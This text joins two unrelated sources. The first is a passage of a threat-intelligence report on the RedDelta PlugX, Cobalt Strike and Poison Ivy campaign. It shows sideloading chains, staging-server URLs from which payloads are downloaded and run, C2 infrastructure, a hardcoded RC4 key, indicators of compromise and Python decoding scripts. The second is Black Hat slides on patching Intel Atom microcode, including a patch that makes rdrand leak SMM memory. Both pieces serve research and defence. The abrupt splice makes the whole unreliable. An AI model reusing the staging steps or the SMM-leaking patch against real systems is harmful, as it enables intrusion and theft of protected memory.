cabsecnow[.]com | September 17, 2019 02:37:37Z
cab-sec[.]com | September 17, 2019 02:37:34Z
forexdualsystem[.]com | October 22, 2018 01:09:46Z*
lionforcesystems[.]com | October 22, 2018 01:09:45Z*
apple-net[.]com | October 22, 2018 01:09:46Z*
wbemsystem[.]com | October 17, 2018 06:51:02Z*
Table 2: Domains with “Ma Ge Bei Luo Xiang Gang Jiu Dian” registrant organization. (*Domains now re-registered)
Figure 6: Context panel from the Recorded Future Intelligence Card™ for ipsoftwarelabs[.]com.
This cluster of activity does not overlap with the infrastructure identified
in the PlugX cluster. The WHOIS registration data for the domains miscrosaft[.]
com and hostareas[.]com contains the registrant organization “sec.” While less
distinct than the “Ma Ge Bei Luo Xiang Gang Jiu Dian’’ registrant identified earlier
in the PlugX cluster, there are still relatively few domains associated with this
organization, and fewer still that were registered through GoDaddy. Using these
characteristics, we identified that the domains svrhosts[.]com, strust[.]club, and
svchosts[.]com all match this criteria and are previously reported Mustang Panda
Cobalt Strike C2 domains. In particular, svrhosts[.]com and svchosts[.]com were
both registered at the same time as hostareas[.]com on February 3, 2019 through
GoDaddy.
Malware Analysis
While there is notable targeting and infrastructure overlap between this
RedDelta campaign and publicly reported Mustang Panda activity, there are some
deviations in tactics, techniques, and procedures (TTPs) used in both. For instance,
Mustang Panda has typically used Windows Shortcut (LNK) files containing an
embedded HTA (HTML Application) file with a VBScript or PowerShell script to load
PlugX and Cobalt Strike Beacon payloads. However, in this campaign, RedDelta
used ZIP files containing legitimate executables masquerading as lure documents,
a notable departure from Mustang Panda activity that has been publicly reported
previously. This legitimate executable is used to load a malicious DLL also
present within the ZIP file through DLL sideloading, before the target is shown
a decoy document. While Mustang Panda have used DLL sideloading previously,
the PlugX variant used in association with this campaign has key differences
from more traditional PlugX variants, particularly in the C2 protocol used and
the configuration encoding within the samples, leading us to refer to it as the
“RedDelta PlugX” variant below — however, this is not intended to suggest that
this variant is used exclusively by this group and is in reference to the first group
we have seen using this variant.
Figure 7: Execution diagram of the malware associated with RedDelta PlugX.
RedDelta PlugX: ‘Hong Kong Security Law’ Lure
The first sample, titled “About China’s plan for Hong Kong security law.zip” (SHA256: 86590f80b4e1608d0367a7943468304f7eb665c9195c24996281b1a958bc1512), corresponds to the Union of Catholic Asian News lure delivering the RedDelta PlugX variant. Although Insikt Group does not have full visibility into this infection chain, the ZIP file is likely to have been delivered via a spearphishing email. The ZIP contains two files:
File Name: About China’s plan for Hong Kong security law.exe
SHA256 Hash: 6c959cfb001fbb900958441dfd8b262fb33e052342948bab338775d3e83ef7f7
File Name: wwlib.dll
SHA256 Hash: f6e5a3a32fb3aaf3f2c56ee482998b09a6ced0a60c38088e7153f3ca247ab1cc
Stage 1: Wwlib.dll DLL Sideload and Hk.dat Download and Execution
“About China’s plan for Hong Kong security law.exe” is a legitimate Windows
loader for Microsoft Word that is vulnerable to sideloading. When executed, it
sideloads the malicious DLL, “wwlib.dll.”
Wwlib.dll initializes the loading stage by downloading, decoding, and executing
an XOR-encoded Windows executable file, hk.dat, from http://167.88.180[.]198/hk.dat. Next, wwlib.dll will extract a Word document, “About China’s plan for Hong
Kong security law.docx” from its resource section and open it to make it appear to
the user that a legitimate Microsoft Word document was opened.
Stage 2: Hk.exe/AAM Updates.exe DLL Sideloading to Load PlugX Variant
After “hk.dat” is decoded and executed, it will create three files in the C:\%APPDATA%/local/temp directory:
• Hk.exe (SHA256: 0459e62c5444896d5be404c559c834ba455fa5cae1689c70fc8c61bc15468681) - A legitimate Adobe executable that is vulnerable to DLL sideloading
• Hex.dll (SHA256: bc6c2fda18f8ee36930b469f6500e28096eb6795e5fd17c44273c67bc9fa6a6d) - The malicious DLL sideloaded by hk.exe that decodes and loads adobeupdate.dat
• Adobeupdate.dat (SHA256: 01c1fd0e5b8b7bbed62bc8a6f7c9ceff1725d4ff6ee86fa813bf6e70b079812f) - The RedDelta PlugX variant loader
Next, “hk.exe” is executed and creates copies of the files “adobeupdate.dat,”
“hex.dll,” and itself renamed as “AAM Updates.exe” in the folder “C:\ProgramData\
AAM UpdatesIIw.” “AAM Updates.exe” is then executed, starting the installation
process by sideloading the malicious “hex.dll.” “Hex.dll” will decode and execute
“adobeupdate.dat,” which ultimately leads to the execution of the RedDelta PlugX
variant in memory. This use of DLL sideloading, including the use of this specific
Adobe executable, aligns with recent public reporting of Mustang Panda PlugX
use (1, 2).
RedDelta PlugX: ‘Qum, the Vatican of Islam’ Lure
The second PlugX sample uses the same loading method identified above. In
this case, the same WINWORD.exe executable is used to load another malicious
wwlib.dll file. The sample then contacts http://103.85.24[.]190/qum.dat to retrieve
the XOR-encoded Windows executable file, qum.dat. This sample uses the same
C2 as above, www.systeminfor[.]com.
RedDelta PlugX: Vatican Lure Targeting Hong Kong Study Mission
The final PlugX sample featuring the Vatican Hong Kong Study Mission
lure also uses largely the same PlugX loading method. In this case, the ZIP file
contains a benign Adobe Reader executable, AcroRd32.exe, renamed “DOC-
2020-05-15T092742.441.exe,” which is used to load the malicious acrord32.dll
file through DLL sideloading. In this case the sample retrieves the file dis.dat from
http://167.88.180[.]198/dis.dat and uses the same C2 referenced in the previous
samples.
RedDelta PlugX: Installation Process
Insikt Group performed detailed analysis on the DAT files related to the “Union
of Catholic Asian News” and “Qum, the Vatican of Islam” lure. Analysis of these
samples showed two DAT files were downloaded from the URLs listed in the table
below:
File Name | Download Location | SHA256 Hash
hk.dat | http://167.88.180[.]198/hk.dat | 2fb4a17ece461ade1a2b63bb8db19947636c6ae39c4c674fb4b7d4f90275d20
qum.dat | http://103.85.24[.]190/qum.dat | 476f80521bf6789d02f475f67e0f4ede830c4a700c3f7f64d99e811835a39e
In each case, the file (“hk.dat” or “qum.dat”) is downloaded and executed after initial execution of the phishing lure, as described above in “Stage 1: Wwlib.dll DLL Sideload and Hk.dat Download and Execution.” Both files are RtlCompress/LZNT1 compressed, as well as XOR-encoded. The XOR key precedes the encoded data, allowing the file to be more easily decoded during static analysis. A Python script to decompress and decode the payload can be found on our GitHub repository.
After the DAT files are decompressed and decoded, they are executed. The execution details for “hk.dat” have been detailed above (see: “Stage 2: Hk.exe/AAM Updates.exe DLL Sideloading to Load PlugX Variant”) and are nearly identical to
that of “qum.dat.” As with the hk.dat sample associated with the “Union of Catholic
Asian News” lure, the main purpose of this stage of the malware is to perform the
DLL sideloading step in order to execute the PlugX variant.
Again, the final stage consists of three files: a non-malicious executable, a
malicious sideloaded DLL, and the encoded DAT file which are all used to sideload
the final payload. This is consistent with a typical PlugX installation.
Like the first-stage DAT files, the PlugX loader DAT file is XOR-encoded and
the decode key precedes the encoded data in the file; however, they are not
RtlCompress/LZNT1 compressed as the initial stage files are. A Python script to
decode the PlugX loader, as well as the configuration block, is contained on our
GitHub repository.
RedDelta: An Updated PlugX Variant
The PlugX variant used in the RedDelta campaign is similar to the PlugX
variants previously associated with Mustang Panda by Avira and Anomali. Both
make heavy use of stack strings as an obfuscation mechanism, as seen in Figure
8, making it harder for an analyst to use strings to determine the functionality or
purpose of the code.
Figure 8: Comparison of Anomali/Avira PlugX variant stack string implementation and RedDelta stack
string implementation.
However, the configuration block for the RedDelta PlugX variant has one
key distinction: the Avira-reported Mustang Panda configuration block decoding
function looks for the string “XXXXXXXX” to determine whether the configuration
is encoded, while the RedDelta variant looks for the string “########.” Apart from
the different demarcator strings, both variants use the same rolling XOR encoding
with the key “123456789.” The configuration block decode routine can be seen
in Figure 9, below.
Figure 9: Comparison of configuration block in Anomali/Avira PlugX (showing the “XXXXXXXX”
demarcator) and the RedDelta configuration block (showing the “########” demarcator).
A Python implementation of this algorithm can be observed in Figure 10,
below.
Figure 10: Python implementation of RedDelta PlugX configuration block decoding mechanism.
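Since Figure 10 is not reproduced in this text version, the following is a reconstruction based only on the description above (the "########" demarcator and the rolling XOR key "123456789"); it is a sketch, not the original script:

KEY = b"123456789"
MARK = b"########"

def decode_config(blob):
    # Locate the demarcator; if absent, the configuration is not encoded
    start = blob.find(MARK)
    if start == -1:
        return blob
    enc = blob[start + len(MARK):]
    # Rolling XOR with the fixed key over the bytes that follow the marker
    return bytes(c ^ KEY[i % len(KEY)] for i, c in enumerate(enc))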
In conventional PlugX samples, the configuration block is encrypted with a
more complex algorithm using multiple keys in combination with shift left and shift
right bitwise operations. For example, the Python code implementing this algorithm,
as seen in Figure 11, was created by Kyle Creyts based on Takahiro Haruyama’s
extensive research and analysis on PlugX.
Figure 11: Python implementation of traditional PlugX configuration block decoding mechanism by
Kyle Creyts.
The configuration block encryption associated with the RedDelta variant is
considerably less sophisticated when compared to traditional PlugX samples, and
while both make use of XOR-based ciphers, the simple algorithm used by RedDelta
would be easier to brute force by an analyst.
Command and Control Protocol
The C2 protocol used for the RedDelta PlugX malware differs from the Mustang Panda PlugX. Both variants use the HTTP POST method common to PlugX, including the number “61456” in the POST header field, which is a clear indicator of a PlugX HTTP POST. However, the RedDelta variant does not include the URI string “/update?wd=” more commonly associated with PlugX, as seen in Figure 12.
Figure 12: HTTP POST request from Anomali/Avira PlugX variant and RedDelta PlugX variant.
The RedDelta PlugX variant encrypts its C2 communications very differently
when compared to the Mustang Panda variant reported by Anomali and Avira.
Instead of using XOR encoding, RedDelta uses RC4 encryption where the first
10 bytes of the passcode are hardcoded and the last four bytes are randomly
generated and included as a key within the TCP packet so that the communication
can be decrypted. The hardcoded portion of the RC4 passphrase is “!n&U*O%Pb$.”
Figure 13 shows the function where the RC4 passphrase is defined as well as
where the last four bytes are appended to create the full key. A Python script to
decode the RedDelta C2 communication from a supplied PCAP can be found on
our GitHub repository.
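A minimal decryption sketch consistent with the scheme described above (hardcoded 10-byte prefix plus the first four transmitted bytes; the key layout is our reading of the analysis, and RC4 is implemented inline to avoid dependencies):

STATIC = b"!n&U*O%Pb$"   # hardcoded 10-byte portion of the RC4 passphrase

def rc4(key, data):
    # Standard RC4 key scheduling and keystream generation
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def decrypt_c2(payload):
    # The first 4 transmitted bytes complete the 14-byte RC4 key
    key = STATIC + payload[:4]
    return rc4(key, payload[4:])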
Despite the different C2 encryption schemes, both RedDelta and Mustang
Panda variants’ C2 traffic decrypts to the familiar PlugX header format, as shown
in Figure 14.
Figure 14: PlugX header and data.
In conventional PlugX samples, the C2 uses the same algorithm as in the
configuration decode (see Figure 11), with part of the key being the first four bytes
of the TCP transmission. While the RedDelta PlugX variant also uses the first four
bytes of the TCP transmission as a part of the key, the use of RC4 for C2 encryption
demonstrates a departure from the usual PlugX C2 traffic encryption mechanism.
Figure 13: C2 encryption/decryption routine showing the first four hardcoded bytes of the
RC4 key used in RedDelta PlugX variant.
While Recorded Future has not done extensive code analysis to further
compare the samples, we have highlighted fundamental differences between the
RedDelta PlugX variants and conventional PlugX, notably in the configuration block
and C2 communication. Additionally, while RedDelta has implemented a modular
delivery system based on traditional PlugX tactics, it also provides the group with
the ability to change, enhance or remove functionality as needed.
Cobalt Strike
The file, OneDrive.exe, is responsible for loading the Cobalt Strike payload.
When executed, OneDrive will reach out to http://154.213.21[.]27/DotNetLoader40.exe, download the file DotNetLoader40.exe, and invoke the “RunRemoteCode”
function contained within it.
DotNetLoader40.exe is a small .NET executable that essentially downloads and
then executes shellcode. The main function in DotNetLoader is “RunRemoteCode”
which takes a URL as an argument. The content is downloaded from the provided
URL, in this case, http://154.213.21[.]27/beacon.txt, and then sent to the function
“InjectShellCode.” The shellcode is then base64 decoded, decompressed, saved
to memory, and executed.
The shellcode loaded is Cobalt Strike Beacon, which is configured using the
Havex Malleable C2 profile. This Havex C2 code has been published on GitHub
and can be used by any entity that wishes to use it; and in this case, the attacker
is doing so in conjunction with Cobalt Strike. This can be seen both through the
URI used within the C2 URL (http://154.213.21[.]70/wp08/wp-includes/dtcla.php)
and the client and server headers and HTML content displayed below in Figure 15.
Figure 15: Network connections and server response to Cobalt Strike Beacon Havex Malleable C2
sample.
File Name: OneDrive.exe
SHA256 Hash: 7824eb5f173c43574593bd3afab41a60e0e2ffae80201a9b884721b451e6d935
Poison Ivy
File Name: MpSvc.dll
SHA256 Hash: 9bac74c592a36ee249d6e0b086bfab395a37537ec87c2095f999c00b946ae81d
The identified Poison Ivy sample is loaded using the above MpSvc.dll file, masquerading as the Microsoft Windows Defender file of the same name. Once loaded, web.miscrosaft[.]com is used for command and control.
Outlook
Our research uncovered a suspected China state-sponsored campaign
targeting multiple high-profile entities associated with the Catholic Church ahead
of the likely renewal of the provisional China-Vatican deal in September 2020.
The CCP’s warming diplomatic relations with the Holy See has been commonly
interpreted as a means to facilitate increased oversight and control over its
unofficial Catholic church. This also supports the CCP’s wider stated goal of
“sinicizing religions” in China. Furthermore, it demonstrates that China’s interest
in control and surveillance of religious minorities is not confined to those within
the “Five Poisons,” exemplified by the continued persecution and detainment of
underground church members and allegations of physical surveillance of official
Catholic and Protestant churches.
The U.S. Ambassador-at-Large for International Religious Freedom recently
expressed concern regarding the impact of the new national security law within
Hong Kong, stating it has the “potential to significantly undermine religious
freedom.” The targeting of the Catholic diocese of Hong Kong is likely a valuable
intelligence source for both monitoring the diocese’s position on Hong Kong’s pro-
democracy movement and its relations with the Vatican. This marks a possible
precursor to increased limits on religious freedom within the special administrative
region, particularly where it coincides with pro-democracy or anti-Beijing positions.
RedDelta is a highly active threat activity group targeting entities relevant
to Chinese strategic interests. Despite the group’s consistent use of well-known
tools such as PlugX and Cobalt Strike, infrastructure reuse, and operations security
failures, these intrusions indicate RedDelta is still being tasked to satisfy intelligence
requirements. In particular, this campaign demonstrates a clear objective to target
religious bodies, and therefore we feel this is particularly pertinent for religious
and non-governmental organizations (NGOs) to take note and invest in network
defenses to counter the threat posed by Chinese state-sponsored threat activity
groups like RedDelta. A lack of ability to invest in security and detection measures
for many NGOs and religious organizations greatly increases the likelihood of
success for well-resourced and persistent groups, even using well-documented
tools, TTPs, and infrastructure.
Network Defense Recommendations
Recorded Future recommends that users conduct the following measures to
detect and mitigate activity associated with RedDelta activity:
• Configure your intrusion detection systems (IDS), intrusion prevention
systems (IPS), or any network defense mechanisms in place to alert on —
and upon review, consider blocking illicit connection attempts from — the
external IP addresses and domains listed in the appendix.
Additionally, we advise organizations to follow these general information security best practice guidelines:
• Keep all software and applications up to date; in particular, operating
systems, antivirus software, and core system utilities.
• Filter email correspondence and scrutinize attachments for malware.
• Make regular backups of your system and store the backups offline,
preferably offsite so that data cannot be accessed via the network.
• Have a well-thought-out incident response and communications plan.
• Adhere to strict compartmentalization of company-sensitive data. In
particular, look at which data anyone with access to an employee account
or device would have access to (for example, through device or account
takeover via phishing).
• Strongly consider instituting role-based access, limiting company-wide
data access, and restricting access to sensitive data.
• Employ host-based controls; one of the best defenses and warning signals
to thwart attacks is to conduct client-based host logging and intrusion
detection capabilities.
• Implement basic incident response and detection deployments and
controls like network IDS, netflow collection, host logging, and web proxy,
alongside human monitoring of detection sources.
• Be aware of partner or supply chain security standards. Being able to
monitor and enforce security standards for ecosystem partners is an
important part of any organization’s security posture.
Recorded Future’s research group, Insikt, tracks threat actors
and their activity, focusing on state actors from China, Iran, Russia,
and North Korea, as well as cyber criminals - individuals and groups
- from Russia, CIS states, China, Iran, and Brazil. We emphasize
tracking activity groups and where possible, attributing them to
nation state government, organizations, or affiliate institutions.
Our coverage includes:
• Government organizations and intelligence agencies, their associated laboratories, partners, industry collaborators, proxy entities, and individual threat actors.
• Recorded Future-identified, suspected nation state activity groups, such as RedAlpha, RedBravo, RedDelta, and BlueAlpha and many other industry established groups.
• Cybercriminal individuals and groups established and named by Recorded Future
• Newly emerging malware, as well as prolific, persistent commodity malware
Insikt Group names a new threat activity group or campaign
when analysts have data corresponding to at least three points
on the Diamond Model of Intrusion Analysis with at least medium
confidence, derived from our Security Intelligence Graph. We can tie
this to a threat actor only when we can point to a handle, persona,
person, or organization responsible. We will write about the activity
as a campaign in the absence of this level of adversary data. We
use the most widely-utilized or recognized name for a particular
group when the public body of empirical evidence is clear the activity
corresponds to a known group.
Insikt Group utilizes a simple color and phonetic alphabet
naming convention for new nation state threat actor groups or
campaigns. The color corresponds to that nation’s flag colors,
currently represented below, with more color/nation pairings to
be added as we identify and attribute new threat actor groups
associated with new nations.
For newly identified cybercriminal groups, Insikt Group uses a
naming convention corresponding to the Greek alphabet. Where we
have identified a criminal entity connected to a particular country,
we will use the appropriate country color, and where that group may
be tied to a specific government organization, tie it to that entity
specifically.
Insikt Group uses mathematical terms when naming newly
identified malware.
Recorded Future Threat Activity Group and Malware Taxonomy
Appendix A — Indicators of Compromise
Command and Control Infrastructure
Domain | IP Address | First Seen | Last Seen | Description
ipsoftwarelabs[.]com | 85.209.43[.]21 | 2019-11-08 | * | PlugX C2
cabsecnow[.]com | 167.88.180[.]32 | 2020-07-14 | * | PlugX C2
cabsecnow[.]com | 103.85.24[.]136 | 2020-06-10 | 2020-07-14 | PlugX C2
cabsecnow[.]com | 167.88.180[.]5 | 2019-10-26 | 2020-06-10 | PlugX C2
cabsecnow[.]com | 167.88.177[.]224 | 2019-09-18 | 2019-10-19 | PlugX C2
lameers[.]com | 167.88.180[.]32 | 2020-02-14 | * | PlugX C2
lameers[.]com | 167.88.180[.]132 | 2019-11-27 | 2020-02-13 | PlugX C2
systeminfor[.]com | 103.85.24[.]136 | 2020-07-15 | * | PlugX C2
systeminfor[.]com | 167.88.180[.]32 | 2020-05-29 | 2020-07-15 | PlugX C2
systeminfor[.]com | 103.85.24[.]190 | 2020-05-17 | 2020-05-29 | PlugX C2
N/A | 103.85.24[.]149 | 2020-06-08 | 2020-06-23 | PlugX C2
N/A | 167.88.180[.]198 | 2020-06-15 | 2020-06-25 | PlugX Payload Staging Server
web.miscrosaft[.]com | 154.213.21[.]207 | 2020-04-27 | * | PIVY C2
N/A | 154.213.21[.]70 | 2020-06-04 | * | Cobalt Strike C2
lib.jsquerys[.]net | 154.213.21[.]70 | 2020-06-04 | * | Associated with Cobalt Strike C2
N/A | 154.213.21[.]27 | 2020-06-04 | * | Cobalt Strike Staging Server
lib.hostareas[.]com | 154.213.21[.]73 | 2020-05-13 | * | Linked through infrastructure overlap
*Denotes that domain or server is still live at time of publication.
PlugX
File Name
About China’s plan for Hong Kong security law.zip
MD5 Hash
660d1132888b2a2ff83b695e65452f87
SHA1 Hash
1d3b34c473231f148eb3066351c92fb3703d26c6
SHA256 Hash
86590f80b4e1608d0367a7943468304f7eb665c9195c24996281b1a958bc1512
File Name
N. 490.349 N. 491.189.zip
MD5 Hash
2a245c0245809f4a33b5aac894070519
SHA1 Hash
c27f2ed5029418c7f786640fb929460b9f931671
SHA256 Hash
fb7e8a99cf8cb30f829db0794042232acfe7324722cbea89ba8b77ce2dcf1caa
File Name
QUM, IL VATICANO DELL’ISLAM.rar
MD5 Hash
2e69b5ed15156e5680334fa88be5d1bd
SHA1 Hash
c435c75877b39406dbe06e357ef304710d567da9
SHA256 Hash
282eef984c20cc334f926725cc36ab610b00d05b5990c7f55c324791ab156d92
File Name
wwlib.dll
MD5 Hash
c6206b8eacabc1dc3578cec2b91c949a
SHA1 Hash
93e8445862950ef682c2d22a9de929b72547643a
SHA256 Hash
4cef5835072bb0290a05f9c5281d4a614733f480ba7f1904ae91325a10a15a04
File Name
wwlib.dll
MD5 Hash
2ec79d0605a4756f4732aba16ef41b22
SHA1 Hash
304e1eb8ab50b5e28cbbdb280d653efae4052e1f
SHA256 Hash
f6e5a3a32fb3aaf3f2c56ee482998b09a6ced0a60c38088e7153f3ca247ab1cc
File Name
acrord32.dll
MD5 Hash
6060f7dc35c4d43728d5ca5286327c01
SHA1 Hash
35ff54838cb6db9a1829d110d2a6b47001648f17
SHA256 Hash
8a07c265a20279d4b60da2cc26f2bb041730c90c6d3eca64a8dd9f4a032d85d3
File Name
hex.dll
MD5 Hash
e57f8364372e3ba866389c2895b42628
SHA1 Hash
fb29f04fb4ffb71f623481cffe221407e2256e0a
SHA256 Hash
bc6c2fda18f8ee36930b469f6500e28096eb6795e5fd17c44273c67bc9fa6a6d
File Name
adobeupdate.dat
MD5 Hash
2351F62176D4F3A6429D9C2FF7D444E2
SHA1 Hash
1BDBABE56B4659FCA2813A79E972A82A26EF12B1
SHA256 Hash
01C1FD0E5B8B7BBED62BC8A6F7C9CEFF1725D4FF6EE86FA813BF6E70B079812F
File Name
hex.dll
MD5 Hash
9c44ec556d53301d86c13a884128b8de
SHA1 Hash
7c683d3c3590cbc61b5077bc035f4a36cae097d4
SHA256 Hash
7d85ebd460df8710d0f60278014654009be39945a820755e1fbd59030c14f4c7
File Name
adobeupdate.dat
MD5 Hash
977beb9a5a2bd24bf333397c33a0a67e
SHA1 Hash
d7e55b655a2a90998dbab0f921115edc508e1bf9
SHA256 Hash
4c8405e1c6531bcb95e863d0165a589ea31f1e623c00bcfd02fbf4f434c2da79
Poison Ivy
File Name
MpSvc.dll
MD5 Hash
b613cc3396ae0e9e5461a910bcac8ca5
SHA1 Hash
28746fd20a4032ba5fd3a1a479edc88cd74c3fc9
SHA256 Hash
9bac74c592a36ee249d6e0b086bfab395a37537ec87c2095f999c00b946ae81d
Cobalt Strike
File Name
OneDrive.exe
MD5 Hash
83763fe02f41c1b3ce099f277391732a
SHA1 Hash
3ed2d4e3682d678ea640aadbfc08311c6f2081e8
SHA256 Hash
7824eb5f173c43574593bd3afab41a60e0e2ffae80201a9b884721b451e6d935
Appendix B — MITRE ATT&CK Mapping
Appendix C — Python Decoding Script
import lznt1  # third-party module, e.g. pip install lznt1

def decompress(filename):
    # First-stage DAT files are RtlCompress/LZNT1 compressed
    with open(filename, "rb") as f:
        return lznt1.decompress(f.read())

# First-stage DAT files (hk.dat/qum.dat) are LZNT1 compressed; the PlugX
# loader DAT files are XOR-encoded only, so set the flag accordingly
compressed = False
filename = "http_dll.dat"

if compressed:
    data = decompress(filename)
else:
    with open(filename, "rb") as dat:
        data = dat.read()

# The XOR key precedes the encoded data and is terminated by a null byte
key = []
for d in data:
    if d != 0x00:
        key.append(d)
    else:
        break

# Skip the key and its null terminator, then apply the rolling XOR
klen = len(key)
output = []
for i, c in enumerate(data[klen + 1:]):
    output.append(c ^ key[i % klen])

with open(filename + ".bin", "wb") as decoded:
    decoded.write(bytearray(output))
About Recorded Future
Recorded Future arms security teams with the only complete security intelligence
solution powered by patented machine learning to lower risk. Our technology
automatically collects and analyzes information from an unrivaled breadth of sources
and provides invaluable context in real time and packaged for human analysis or
integration with security technologies.
Custom Processing Unit:
Tracing and Patching Intel Atom Microcode
Black Hat USA 2022
Pietro Borrello
Sapienza University of Rome
Martin Schwarzl
Graz University of Technology
Michael Schwarz
CISPA Helmholtz Center for Information Security
Daniel Gruss
Graz University of Technology
Outline
1. Deep dive on CPU µcode
2. µcode Software Framework
3. Reverse Engineering of the secret µcode update algorithm
4. Some bonus content ;)
Disclaimer
• This is based on our understanding of CPU Microarchitecture.
• In theory, it may be all wrong.
• In practice, a lot seems right.
How do CPUs work?
Positive Technologies Results
• Red Unlock of Atom Goldmont (GLM) CPUs
• Extraction and reverse engineering of GLM µcode format
• Discovery of undocumented control instructions to access internal buffers
Microcoded Instructions 101
(Diagram: macro-instructions such as cpuid are translated via XLAT into µcode flows; the µcode ROM and its ROM sequence words hold the stock flows, the µcode RAM and its RAM sequence words hold patches, and the match & patch mechanism redirects ROM addresses into the RAM.)
µcode instruction
OP1:  09282eb80236
OP2:  0008890f8009
OP3:  092830f80236
SEQW: 0903e480
Deep Dive into the µcode
U1a54: 09282eb80236   CMPUJZ_DIRECT_NOTTAKEN(tmp6, 0x2, U0e2e)
U1a55: 0008890f8009   tmp8:= ZEROEXT_DSZ32(0x2389)
U1a56: 092830f80236   SYNC-> CMPUJZ_DIRECT_NOTTAKEN(tmp6, 0x3, U0e30)
U1a57: 000000000000   NOP
SEQW:  0903e480       SEQW GOTO U03e4
Building a Ghidra µcode Decompiler
Control Registers Bus
• CPU interacts with its internal components through the CRBUS
• MSRs → CRBUS addr
• Control and Status registers
• SMM configuration
• Local Direct Access Test (LDAT) access
Accessing the µcode Sequencer
• The µcode Sequencer manages the access to µcode ROM and RAM
→ The LDAT has access to the µcode Sequencer
→ We can access the LDAT through the CRBUS
→ If we can access the CRBUS we can control µcode!
udbgrd and udbgwr
Positive Technologies discovered the existence of two secret instructions that can access (RW):
• System agent
• URAM
• Staging buffer
• I/O ports
• Power supply unit
• CRBUS
e.g., Writing to the CRBUS
def CRBUS_WRITE(ADDR, VAL):
    udbgwr(
        rax: ADDR,
        rbx|rdx: VAL,
        rcx: 0,
    )
Program LDAT from the CRBUS
// Decompile of U2782 - part of the ucode update routine
write8(crbus_06a0, (ucode_address - 0x7c00));
MSLOOPCTR = (*(ushort *)((long)ucode_update_ptr + 3) - 1);
syncmark();
if ((in_ucode_ustate & 8) != 0) {
    sync_full();
    write8(crbus_06a1, 0x30400);
    ucode_ptr = (ulong *)((long)ucode_update_ptr + 5);
    do {
        ucode_qword = *ucode_ptr;
        ucode_ptr = ucode_ptr + 1;
        write8(crbus_06a4, ucode_qword);
        write8(crbus_06a5, ucode_qword >> 0x20);
        syncwait();
        MSLOOPCTR -= 1;
    } while (-1 < MSLOOPCTR);
    sync_full();
}
Writing to the µcode Sequencer
def ucode_sequencer_write(SELECTOR, ADDR, VAL):
    CRBUS[0x6a1] = 0x30000 | (SELECTOR << 8)
    CRBUS[0x6a0] = ADDR
    CRBUS[0x6a4] = VAL & 0xffffffff
    CRBUS[0x6a5] = VAL >> 32
    CRBUS[0x6a1] = 0

with SELECTOR:
    2 -> SEQW PATCH RAM
    3 -> MATCH & PATCH
    4 -> UCODE PATCH RAM
Match & Patch 101
Redirects execution from µcode ROM to µcode RAM to execute patches.
patch_off = (patch_addr - 0x7c00) / 2;
entry:
+--+-----------+------------------------+----+
|3e| patch_off |       match_addr       |enbl|
+--+-----------+------------------------+----+
  24          16                        1    0
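Reading the field boundaries off that diagram, packing an entry is one line of bit arithmetic; a minimal sketch in Python (the boundaries are as drawn above, so treat this as illustrative):

def match_patch_entry(patch_addr, match_addr, enable=True):
    patch_off = (patch_addr - 0x7c00) // 2   # formula from the slide
    # tag 0x3e | patch_off | match_addr | enable bit, per the diagram
    return (0x3e << 24) | (patch_off << 16) | (match_addr << 1) | int(enable)

# e.g., redirect the ROM entry point 0x0428 (rdrand) into patch RAM at 0x7c00
print(hex(match_patch_entry(0x7c00, 0x0428)))   # -> 0x3e000851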
The first µcode Framework
Leveraging udbgrd/wr we can patch µcode via software:
• Completely observe CPU behavior
• Completely control CPU behavior
• All within a BIOS or kernel module
µcode Framework
• Patch µcode
• Hook µcode
• Trace µcode
µcode patches
We can change the CPU's behavior.
• Change microcoded instructions
• Add functionalities to the CPU
µcode patch Hello World!
.patch 0x0428 # RDRAND ENTRY POINT
.org 0x7c00
rax:= ZEROEXT_DSZ64(0x6f57206f6c6c6548) # 'Hello Wo'
rbx:= ZEROEXT_DSZ64(0x21646c72) # 'rld!\x00'
UEND
1. Assemble µcode
2. Write µcode at 0x7c00
3. Setup Match & Patch: 0x0428 → 0x7c00
4. rdrand → "Hello World!"
Make rdrand less boring
rdrand returns random data, what if we make it return SMM memory?
.patch 0x0428 # RDRAND ENTRY POINT
.org 0x7c00
tmp1:= MOVEFROMCREG_DSZ64(CR_SMRR_MASK)
tmp2:= ZEROEXT_DSZ64(0x0)
MOVETOCREG_DSZ64(tmp2, CR_SMRR_MASK) # DISABLE SMM MEMORY RANGE
rax:= LDPPHYS_DSZ64(0x7b000000) # SMROM ADDR
MOVETOCREG_DSZ64(tmp1, CR_SMRR_MASK)
UEND
DEMO
µcode hooks
Install µcode hooks to observe events.
• Setup Match & Patch to execute custom µcode at certain
events
• Resume execution
Make your own performance counter
We can make the CPU react to certain µcode events, e.g., verw executed
.patch 0xXXXX # INSTRUCTION ENTRY POINT
.org 0x7da0
tmp0:= ZEROEXT_DSZ64(<counter_address>)
tmp1:= LDPPHYSTICKLE_DSZ64_ASZ64_SC1(tmp0)
tmp1:= ADD_DSZ64(tmp1, 0x1) # INCREMENT COUNTER
STADPPHYSTICKLE_DSZ64_ASZ64_SC1(tmp0, tmp1)
UJMP(0xXXXX + 1) # JUMP TO NEXT UOP
µcode traces
Trace µcode execution leveraging hooks. Each hook: 1. dump timestamp, 2. disable hook, 3. continue.
(Animation: cpuid enters unknown µcode; planting a hook at one candidate address per run reveals, run by run, the order in which addresses execute - observed here as 1, 2, 5, 3, 4 - and sorting by timestamp reconstructs the full trace 1 2 3 4 5.)
Reversing µcode updates
µcode update algorithm has always been kept secret by Intel
Let's trace the execution of a µcode update!
• Trigger a µcode update
• Trace if a microinstruction is executed
• Repeat for all the possible µcode instructions
• Restore order
GLM µcode update algorithm
Update layout: metadata | nonce | RSA mod | RSA exp | RSA sig | ucode patch
(Flow, as recovered by tracing:)
1. wrmsr triggers the update; the ucode patch is moved to 0xfeb01000
2. SHA256 checks run over the update header fields
3. nonce + CPU secret → key expansion → RC4 key
4. The first 0x200 bytes of the RC4 keystream are discarded
5. The ucode patch is decrypted
6. SHA256, then RSA verify
7. Parse ucode!
What is address 0xfeb01000 (1/2)
The temporary physical address where µcode is decrypted.
> sudo cat /proc/iomem | grep feb00000
:(
> read physical address 0xfeb01000
00000000: ffff ffff ffff ffff ffff ffff ffff ffff
00000010: ffff ffff ffff ffff ffff ffff ffff ffff
00000020: ffff ffff ffff ffff ffff ffff ffff ffff
00000030: ffff ffff ffff ffff ffff ffff ffff ffff
What is address 0xfeb01000 (2/2)
